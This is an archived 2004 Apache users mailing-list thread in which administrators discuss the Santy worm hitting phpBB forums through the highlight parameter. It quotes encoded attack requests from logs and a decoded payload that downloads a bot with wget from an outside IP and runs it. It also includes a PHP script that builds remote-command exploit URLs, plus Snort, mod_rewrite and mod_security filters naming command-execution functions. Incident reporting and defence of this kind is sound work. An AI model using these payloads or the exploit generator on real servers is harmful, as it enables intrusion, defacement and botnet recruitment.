You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Anders Norrbring <li...@norrbring.se> on 2004/12/25 10:03:00 UTC
[users@httpd] Is this for real?
Do anybody have any ideas on this e-mail? My admin inbox was full of these e-mails this morning, I don't know if
they're for real, or what... Can someone please advice? There is one phpbb running on the server...
HEADERS:
Return-Path: <ww...@iris>
Received: from mail.the-server.net ([unix socket])
by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
X-Sieve: CMU Sieve 2.2
Received: from localhost (localhost [127.0.0.1])
by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
Sat, 25 Dec 2004 00:50:23 +0100 (CET)
Received: from mail.the-server.net ([127.0.0.1])
by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
Received: by mail.the-server.net (Postfix, from userid 30)
id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
Date: Sat, 25 Dec 2004 00:48:48 +0100
To: postmaster, hostmaster, abuse, admin, root
Subject: YOUR SERVER HAS BEEN HACKED
Message-ID: <41...@iris.the-server.net>
User-Agent: nail 10.5 4/27/03
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
From: wwwrun (WWW daemon apache)
X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net
MESSAGE BODY:
YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Is this for real?
Posted by Shannon Eric Peevey <sp...@unt.edu>.
>>
>>
>>> At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
>>
>>
>> Front what I have read, this can happen in any phpbb version lower
>> than 2.0.11
>>
>> This exploit is becoming frequent. Normally uploading a ddos bot.
>
Note, according to this thread from bugtraq, there is a new variant of
this worm that effects 2.0.11 as well:
http://securityfocus.com/archive/1/385465/2004-12-23/2004-12-29/2
Also, please trim your messages, as it is difficult to follow the thread
through such a long message.
thanks,
--
Shannon Eric Peevey => "speeves"
Dyno-Mite! System Administrator => speeves@unt.edu
Central Web Support => (940) 369-8876
University of North Texas => http://web2.unt.edu
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Is this for real?
Posted by Norman Peelman <np...@cfl.rr.com>.
----- Original Message -----
From: "Anders Norrbring" <li...@norrbring.se>
To: <us...@httpd.apache.org>
Cc: <da...@pa.press.net>
Sent: Saturday, December 25, 2004 5:47 AM
Subject: RE: [users@httpd] Is this for real?
>
> Thanks.. (?)
>
> Yep, one of my hosting clients have a phpBB up and running, or correctly,
HAD it up and running. I killed it for now.
> I posted in phpBB forums too, it's a vulnerability in PHP and phpBB that
allows a worm named Perl.Santy to exploit the
> server.
> Related reading:
http://news.zdnet.com/2100-1009_22-5499725.html?tag=nl.e589
>
> I took his site offline and moved all his files out to tape for the time
being, if my client can't fix it, he's out of
> the system...
>
> Will upgrading phpBB "kill" the worm, or is my server in danger anyway?
How do I kill and delete the worm effectively?
>
> I ran Kaspersky AV scanner on the phpBB directories and the /usr/share/php
directories, it didn't find anything. Also,
> I had a perl process running that took 96.6% of the servers CPU time,
after deleting the phpBB and restart of the
> server, perl isn't active at all.
>
> Am I safe? Or is the disaster coming?
>
>
> Thanks anyway, and have a great rest of the holidays!
> Anders Norrbring
> Norrbring Consulting
>
>
> > >66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> > >/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&high
> > >light=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)
> > >%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(
> > >111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%25
> > >2echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)
> > >%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech
> > >r(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%2
> > >52echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr
> > >(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%25
> > >2echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(5
> > >2)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252e
> > >chr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%
> > >252e%2527
> > >HTTP/1.0" 200 270
> > >"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73
> > >fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)
> > >%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252ech
> > >r(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%
> > >252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(11
> > >3)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252ec
> > >hr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%
> > >252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr
> > >(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%
> > >252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(1
> > >12)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252
> > >echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)
> > >%252echr(41)%252echr(34))%252e%2527"
> > >"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> > >
> > >--
Well, it's not really a bug in PHP. 'preg_replace' specifically uses the
'e' switch for part of its functionality, see:
http://us4.php.net/manual/en/reference.pcre.pattern.modifiers.php . It is
the programmers responsibility to make sure that offending variables are
clean before using them. A simple patch would be to add a line(s) that
cleans the variable 'highlight' (as seen in the code at the end of the first
line, start of second line) so that it doesn't contain the offending
characters:
$highlight = str_replace('%252Esystem','',$highlight);
$highlight = str_replace('%252echr(','',$highlight);
---
...should stop this worm in its tracks.
Norm
---
FREE Avatar Hosting at www.easyavatar.com
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
RE: [users@httpd] Is this for real?
Posted by Anders Norrbring <li...@norrbring.se>.
Thanks.. (?)
Yep, one of my hosting clients have a phpBB up and running, or correctly, HAD it up and running. I killed it for now.
I posted in phpBB forums too, it's a vulnerability in PHP and phpBB that allows a worm named Perl.Santy to exploit the
server.
Related reading: http://news.zdnet.com/2100-1009_22-5499725.html?tag=nl.e589
I took his site offline and moved all his files out to tape for the time being, if my client can't fix it, he's out of
the system...
Will upgrading phpBB "kill" the worm, or is my server in danger anyway? How do I kill and delete the worm effectively?
I ran Kaspersky AV scanner on the phpBB directories and the /usr/share/php directories, it didn't find anything. Also,
I had a perl process running that took 96.6% of the servers CPU time, after deleting the phpBB and restart of the
server, perl isn't active at all.
Am I safe? Or is the disaster coming?
Thanks anyway, and have a great rest of the holidays!
Anders Norrbring
Norrbring Consulting
> -----Original Message-----
> From: Dave Floyd [mailto:dave.floyd@pa.press.net]
> Sent: Saturday, December 25, 2004 11:13 AM
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] Is this for real?
>
> Anders,
> Sadly this is quite likely. See the appended messages for more details:
>
> At 20:23 +1100 21/12/2004, L. Walker wrote:
> >Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST)
> >Subject: Worm hitting PHPbb2 Forums
> >From: "L. Walker" <lw...@magi.net.au>
> >To: incidents@securityfocus.com
> >Cc: full-disclosure@lists.netsys.com
> >
> >Just spotted two clients hit by this. One client didnt update his
> >software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
> >Chkrootkit says its Adore, however could be something else. Datacenter
> >wasn't very smart and has since wiped the server, so no binaries or other
> >evidence.
> >
> >Generation 12 only wiped out PHP files, replacing them with its own
> >message on other client's PHPbb2 forum. Access logs show:
> >
> >66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> >/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&high
> >light=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)
> >%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(
> >111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%25
> >2echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)
> >%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech
> >r(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%2
> >52echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr
> >(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%25
> >2echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(5
> >2)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252e
> >chr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%
> >252e%2527
> >HTTP/1.0" 200 270
> >"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73
> >fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)
> >%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252ech
> >r(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%
> >252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(11
> >3)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252ec
> >hr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%
> >252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr
> >(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%
> >252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(1
> >12)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252
> >echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)
> >%252echr(41)%252echr(34))%252e%2527"
> >"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> >
> >--
> >L. Walker <lwalker at magi dot net dot au>
> >Network Administrator / Consultant
> >--
> >
> >>At 12:46 -0500 21/12/2004, Christopher Adickes wrote:
> >
> >In addition to your post here is some more info.
> >
> >http://isc.sans.org/
> >
> >>At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
> >
> >Front what I have read, this can happen in any phpbb version lower than 2.0.11
> >
> >This exploit is becoming frequent. Normally uploading a ddos bot.
> >>
> >>At 12:53 -0500 21/12/2004, Chris Ess wrote:
> >>
> >>Generation 9 appears to overwrite files with the following extensions:
> >>.htm, .php, .asp, .shtm, .jsp, .phtm
> >>
> >>It only displays a defacement message saying
> >>
> >>"NeverEverNoSanity WebWorm generation #"
> >>
> >>Where # is the generation of the worm.
> >>
> >>This bug only exploits a hole in phpBB2 as far as I can tell. It does not
> >>appear to exploit a hole within PHP. In order to protect yourself, you
> >>must upgrade phpBB2 to version 2.0.11. See
> >>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
> >>
> >>The only code modification that this worm appears to do is increments its
> >>generation count every time it hits a server. Generation 9 does not
> >>contain anything that would indicate the ability to install a rootkit. I
> >>suspect that the rootkit may have been installed separately.
> >>
> >>I extracted a full copy of generation 9 of this worm based on the access
> >>logs of a site hit by it. I was going to do a code review whenever I got
> >>the chance to properly do one.
> >>
> >>Sincerely,
> >>
> >>
> >>Chris Ess
> >System Administrator / CDTT (Certified Duct Tape Technician)
> >
> >>At 11:29 -0700 21/12/2004, lists <li...@innocence-lost.net> wrote:
> >
> >Funny enough, I got a message from a former employer about this worm
> >yesterday- a box I had setup that had hardened php on it got hit hard by
> >this worm. I must've misread the advisory as I was under the impression
> >that the Hardened PHP patches protected PHP through canary values from
> >this bug? Or does it use more than just unserialize() (i.e. realpath() )
> >
> >>At 14:14 -0500 21/12/2004, Chris Ess wrote:
> >
> >> Funny enough, I got a message from a former employer about this worm
> >> yesterday - a box I had setup that had hardened php on it got hit hard by
> >> this worm. I must've misread the advisory as I was under the impression
> >> that the Hardened PHP patches protected PHP through canary values from
> >> this bug? Or does it use more than just unserialize() (i.e. realpath() )
> >
> >This worm appears to have nothing to do with the bugs fixed in versions
> >4.3.10 and 5.0.3 of PHP.
> >
> >The bug occurs in this line in viewtopic.php in phpBB2:
> >(Formatting changed to make it look pretty. It's line 1109 in phpBB2
> >2.0.10)
> >
> >$message = str_replace('\"', '"',
> > substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se',
> > "preg_replace('#\b(" . $highlight_match . ")\b#i',
> > '<span style=\"color:#"
> > . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' .
> > $message . '<'), 1, -1));
> >
> >The 'e' flag on the regex pattern tells it to interpret the statement as
> >valid PHP code and run it. (Reference is:
> >http://www.php.net/manual/en/reference.pcre.pattern.modifiers.php)
> >
> >The bug that is exploited works in such a way that it actually runs the
> >command that is passed through the highlight GET variable. I'm not 100%
> >sure how this works since I haven't had the chance to correlate the
> >strings recorded in apache's access log with the above code.
> >
> >>At 12:21 -0700 21/12/2004, lists wrote:
> >
> >Yea good catch, after looking into it a little further I found that it
> >wasn't related to that advisory, but rather to one from 11.13.04, the
> >exploit code of the original bug can be found on k-otik.com
> >
> >Thanks for the info
> >
> >>At 21:00 +0000 21/12/2004, Barrie Dempster <ba...@reboot-robot.net> wrote:
> >
> >More information:
> >
> >Mis-reported and then corrected at the ISC -
> >http://isc.sans.org/diary.php?date=2004-12-21
> >
> >* The advisory is here - htp://howdark.com/
> >(it was there when the advisory was initially released but that site
> >seems down atm, included here in hope that howdark.com resurfaces)
> >
> >* The fix is here - http://www.phpbb.com/phpBB/viewtopic.php?t=240513
> >
> >* The exploit is here - http://www.howdark.com/poc/phpbb2010_hl.phps
> >(down as above, but included here as it was the original source, try
> >here http://www.k-otik.com/exploits/20041122.r57phpbb2010.pl.php )
> >
> >* SNORT Rule is here - http://www.webservertalk.com/message554529.html
> >
> >* If you got owned by this then your Christmas present is here
> >http://ysati.com hehe ;-P
> >
> >With Regards..
> >Barrie Dempster (zeedo) - Fortiter et Strenue
> >
> >>At 13:28 -0500 21/12/2004, Mike <mi...@shaw.ca> wrote:
> >
> >Does this affect PHPBB2 in general, or is it platform specific as well?
> >
> >>At 19:53 -0500 21/12/2004, M. Shirk wrote:
> >
> >I missed an important "F" on my previous post for these snort sigs.
> >
> >alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
> >(msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A
> >Worm"; flow:to_server,established; uricontent:"/viewtopic.php?";
> >nocase; uricontent:"&highlight='.fwrite(fopen("; nocase;
> >reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513;
> >sid:9999999; rev:1;)
> >
> >Shirkdog
> >http://www.shirkdog.us
> >
> >
>
> At 15:51 -0800 20/12/2004, Shannon Lee wrote:
> >X-VirusChecked: Checked
> >X-Env-Sender: bugtraq-return-17330-dave.floyd=pa.press.net@securityfocus.
> > com
> >X-StarScan-Version: 5.4.5; banners=-,-,-
> >X-Originating-IP: [205.206.231.26]
> >X-SpamWhitelisted: domain whitelist
> >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
> >List-Id: <bugtraq.list-id.securityfocus.com>
> >List-Post: <ma...@securityfocus.com>
> >List-Help: <ma...@securityfocus.com>
> >List-Unsubscribe: <ma...@securityfocus.com>
> >List-Subscribe: <ma...@securityfocus.com>
> >Delivered-To: mailing list bugtraq@securityfocus.com
> >Delivered-To: moderator for bugtraq@securityfocus.com
> >Date: Mon, 20 Dec 2004 15:51:13 -0800
> >From: Shannon Lee <sh...@webhostworks.net>
> >User-Agent: Mozilla Thunderbird 0.7.3 (X11/20040803)
> >X-Accept-Language: en-us, en
> >To: bugtraq@securityfocus.com
> >Subject: phpBB Worm
> >
> >This morning one of our client's sites was found to have been defaced
> >with the words "NeverEverNoSanity WebWorm Generation 9." The defacement
> >appeared to take place on all .html files in the web root trees of
> >multiple virtual hosts on the web server in a very short period of time.
> >
> >After some investigation, we determined that the attacker had gained
> >access via phpbb in a series of crafted URL requests, like so:
> >
> >64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
> >/viewtopic.php?p=9002&sid=f5
> >399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(1
> >09)%252echr
> >(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),
> >chr(97)),ch
> >r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%
> >252echr(47)
> >%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252ec
> >hr(101)%252
> >echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(
> >101)%252ech
> >r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
> >OMITTED.com/
> >viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%
> >2527%252Efw
> >rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)
> >%252echr(11
> >1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)
> >%252echr(11
> >5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252
> >echr(47)%25
> >2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr
> >(117)%252ec
> >hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0
> >(compatible; MSIE 6.0; Windows NT 5.1)"
> >
> >After checking the phpbb site, it turns out that this is a vulnerability
> >posted the 18th of November, called Hilight; we didn't update to prevent
> >it because the client whose domain it was has their own admin, and we
> >thought he was taking care of phpBB. Oops. The exploit is described here:
> >
> >http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
> >
> >When I copied all these entries out of the log and translated the chr()
> >calls, they turned out to be the attached perl script, which is capable
> >of finding .html files to deface, and then going to google and finding
> >more instances of phpbb to infect. Which makes it a worm. It also
> >tracks itself by generation; we were generation 9.
> >
> >Please find attached the above-mentioned script as well as the series of
> >log entries from access_log.
> >
> >--Shannon
> >
> >
> >
> >At 23:28 +0100 21/12/2004, Raymond Dijkxhoorn wrote:
> >>
> >>If you cannot fix it (virtual servers) fast for all your clients
> >>you could also try with something like this:
> >>
> >> RewriteEngine On
> >> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
> >> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
> >> RewriteRule ^.*$ - [F]
> >>
> >>We had some vhosts where this worked just fine. On our systems we
> >>didnt see any valid request with echr and esystem, just be gentle
> >>with it, it works for me, it could work for you ;)
> >
> >At 15:11 -0500 21/12/2004, Paul Kurczaba wrote:
> >>
> >>It seems that a good number of sites have been compromised due to this
> >>exploit. Doing a search for "NeverEverNoSanity WebWorm Generation" on google
> >>revealed nothing. But, when I did the same search on the new MSN beta search
> >>engine, a whopping 36,000 hits showed up. Check it out:
> >>http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWo
> >>rm+Generation%22&FORM=QBRE
> >
> >At 12:22 +0100 22/12/2004, Sebastian Wiesinger <bo...@fire-world.de> wrote:
> >> > We had some vhosts where this worked just fine. On our systems we didnt
> >>> see any valid request with echr and esystem, just be gentle with it, it
> >>> works for me, it could work for you ;)
> >>
> >>If you use mod_security, this may help, too:
> >>
> >>SecFilterSelective "THE_REQUEST"
> >>"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
> >> >>
> >>I had another exploit attempt, with this payload:
> >>
> >>66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET
> >>/forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3
> >>B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31
> >>%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%
> >>70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%6
> >>9%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68
> >>%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%
> >>2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=
> >>%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%
> >>52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
> >>
> >>Which decodes to:
> >>
> >>rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe
> >>y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b
> >>*.pl b0t*; echo _END_
> >>highlight='.passthru($HTTP_GET_VARS[rush]).'
> >>
> >>Regards,
> >>
> >>Sebastian
> >
> >At 17:21 +0200 22/12/2004, Alexander Klimov <al...@inbox.ru> wrote:
> >>
> >>It seems that automated exploiting starts soon after disclosure of the
> >>vulnerability:
> >>
> >>62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
> >>"GET /viewtopic.php?t=50674&highlight=
> >>%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
> >>HTTP/1.1" 404 219
> >>
> >>Interestingly, we do not use phpbb and in fact do not have
> >>viewtopic.php at all.
> >
> >At 4:34 +0000 22/12/2004, <yc...@sneakemail.com> wrote:
> >>
> >>Forgive me if this is a newbie question, but a site I help run was
> >>hit by this, and I'm trying to understand it to protect against
> >>future worms.
> >>
> >>The worm exploits the phpBB highlight vulnerability. It uses PHP
> >>to run Perl to write the Perl script file, then executes it. The
> >>script then proceeds to traverse the entire directory structure,
> >>overwriting .php, .htm, .shtm, .phtm, and on our server, .ssi
> >>files, and then spreads itself. Correct?
> >>
> >>I have two questions:
> >>
> >>1. Why has the worm been as effective on Windows servers as on
> >>*nix servers? At the very least, shouldn't the difference in file
> >>and directory naming cause a problem? I looked at the decoded Perl
> >>script, but I'm not a Perl expert, so I couldn't understand all of
> >>it. And what about the difference in file permissions?
> >>
> >>2. More importantly, why wasn't the worm's destructive ability
> >>limited by file permissions, especially on *nix servers? If, for
> >>example, an HTML file on the server was uploaded by user bob, and
> >>has permissions of 755, how can the Perl script delete that file?
> >>Shouldn't the Perl script be created with the Perl process's
> >>permissions, which was invoked by PHP, which should have the Web
> >>server's permissions, which should be, at least on most *nix
> >>servers, the nobody user?
> >>
> >>This is a big issue on shared servers, or virtual hosts, whatever
> >>you want to call them. Our site is on a shared server, and our
> >>site does not even run phpBB, but most of our HTML files were
> >>replaced with the worm's content. Obviously, then, another site on
> >>the server must have an old version of phpBB. But why could the
> >>worm, coming in through another site, modify files created by other
> >>users? Even if the worm's script ran as the owner of the
> >>vulnerable viewtopic.php file, how could it then modify
> >>non-world-writable files created by other users?
> >>
> >>I have long been concerned with the security of PHP scripts,
> >>especially on shared servers. Since PHP almost always runs as an
> >>Apache module, and Apache usually runs as nobody, one must make
> >>files and directories world-writable for PHP scripts to be able to
> >>write to them. But that means that any process on the server,
> >>including anyone's PHP script, can modify the files.
> >>
> >>Thanks for any insights.
> >>
> >>Adam Porter
> >
> >At 21:28 -0600 22/12/2004, Alvin Packard wrote:
> >>
> >>Last look at my log files and I was hit a total of 421 times by 278
> >>different IPs. It seems to be moving rather quickly as these were from
> >>the last 2 days. Good luck to those who have not patched yet.
> >>
> >>Alvin Packard, CWNA
> >>www.networksecuritytech.com
> >
> >At 13:31 +0100 23/12/2004, Anders Henke wrote:
> >> > 1. Why has the worm been as effective on Windows servers as on
> >>*nix servers? At the very least, shouldn't the difference in file
> >>and directory naming cause a problem? I looked at the decoded Perl
> >>script, but I'm not a Perl expert, so I couldn't understand all of
> >>it. And what about the difference in file permissions?
> >>
> >>Perl does provide cross-platform-functions for e.g. file access and
> >>there's usually not much of a difference for running a well-written
> >>perl script on Unix as well as on Windows other than the first line
> >>(usually '#!c:\perl\perl.exe -w' on Windows and '#! /usr/bin/perl -w'
> >>on Unix).
> >>
> >>However, most Windows-Webservers other than Apache do run any .pl-Script
> >>using the to-be-installed perl interpreter and don't care on the bang-line.
> >>
> >>The documentation found in 'perldoc perlport' does give a closer view
> >>on the few differences when writing cross-plattform perl scripts.
> >>
> >>> 2. More importantly, why wasn't the worm's destructive ability
> >>>limited by file permissions, especially on *nix servers? If, for
> >>>example, an HTML file on the server was uploaded by user bob, and
> >>>has permissions of 755, how can the Perl script delete that file?
> >>>Shouldn't the Perl script be created with the Perl process's
> >>>permissions, which was invoked by PHP, which should have the Web
> >>>server's permissions, which should be, at least on most *nix
> >>>servers, the nobody user?
> >>
> >>On shared servers with ISPs caring about security, user CGIs are using the
> >>suexec mechanism in order to run each customer within his own user's space.
> >>
> >>The downside of using suexec is that PHP as a CGI doesn't offer a small
> >>number of special features some people do believe to be essential, as well
> >>as some people do write code in a way that making it work on PHP as CGI
> >>is close to 'virtually impossible'. The PHP-Module also allows one to
> >>set PHP-configuration settings via .htaccess; those configuration
> >>changes are also ignored by CGI-PHP and can severely affect the way
> >>an PHP-written application works (or doesn't work).
> >>
> >>> This is a big issue on shared servers, or virtual hosts, whatever
> >>>you want to call them. Our site is on a shared server, and our
> >>>site does not even run phpBB, but most of our HTML files were
> >>>replaced with the worm's content. Obviously, then, another site
> >>>on the server must have an old version of phpBB. But why could
> >>>the worm, coming in through another site, modify files created by
> >>>other users? Even if the worm's script ran as the owner of the
> >>>vulnerable viewtopic.php file, how could it then modify
> >>>non-world-writable files created by other users?
> >>
> >>
> >>
> >>Right - if everyone were using e.g. suexec, this would be the case.
> >>
> >>As a web host, you've got to chose to run either CGI-PHP or PHP as
> >>module.
> >>
> >>Your 'power'-users are calling for the module, the admin keeping
> >>maintenance on an already overloaded server does also all for the module
> >>(the module relieves the web server from forking a seperate process for
> >>running a php-script), only those security-related ones are rejecting both
> >>mod_perl as well as mod_php and favour 'true' CGIs via suexec.
> >>
> >>If your scripts support the fastcgi extension, one might use mod_fastcgi
> >>with suexec support; however, this means one has to setup three softwares
> >>(fastcgi, suexec, php) and make them work together instead of the
> >>often-recommended 'add mod_php'-Oneliner. As a result, you're spending
> >>much work on a secure system, but your users are still calling for mod_php
> >>and in case any part of your setup breaks, your whole system is unusable.
> >>
> >>> I have long been concerned with the security of PHP scripts,
> >>>especially on shared servers. Since PHP almost always runs as an
> >>>Apache module, and Apache usually runs as nobody, one must make
> >>>files and directories world-writable for PHP scripts to be able to
> >>>write to them. But that means that any process on the server,
> >>>including anyone's PHP script, can modify the files.
> >>
> >>
> >>Yes, you've got the point.
> >>
> >>Apache 2 has the ability to run modules per VirtualHost within a different
> >>user context (perchild MPM).
> >>-According to the Apache documentation, this module is non-functional,
> >> not yet finished and development is not currently active.
> >>-PHP is certainly one of the most interesting modules for this feature,
> >> however, the last time I looked, exactly PHP didn't support it and Apache
> >> required to have at least one process running per virtualhost (which in
> >> turn would render servers hosting thousands of sites unusable).
> >>-Still today, the php documentation warns from using Apache 2.0 with PHP
> >> in productive environment.
> >>
> >>From a security aspect, the only way for running PHP securely
> >>(with 'secure' from the view of the administrator), CGI is currently
> >>the only way to do so.
> >>
> >>
> >>
> >>Regards,
> >>
> >>Anders
> >>--
> >>Schlund + Partner AG Security and System Administration
> >>Brauerstrasse 48 v://49.721.91374.50
> >>D-76135 Karlsruhe f://49.721.91374.225
> >
> >At 23:34 +0000 22/12/2004, William Geoghegan wrote:
> >>
> >>A script to check if your phpBB is vulnerable.
> >>Anything below 2.0.11 _probably_ is but incase your not sure, use
> >>this script.
> >>
> >>The script generates the request parameters, all you need to do is
> >>copy the result onto www.thesite.com/viewtopic.php
> >>
> >>
> >><?
> >>$rush='ls -al'; //do what
> >>$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch
> >>
> >>print "?t=%37&rush=";
> >>
> >>for ($i=0; $i<strlen($rush); ++$i) {
> >> print '%' . bin2hex(substr($rush,$i,1));
> >>}
> >>
> >>print "&highlight=%2527.";
> >>
> >>for ($i=0; $i<strlen($highlight); ++$i) {
> >> prt '%' . bin2hex(substr($highlight,$i,1));
> >>}
> >>
> >>print ".%2527";
> >>?>
> >>
> >>Cheers.
> >>
> >>William Geoghegan
> >>
> >>GEOTEK Computer Services
> >>- www.geotekcs.co.uk -
> >
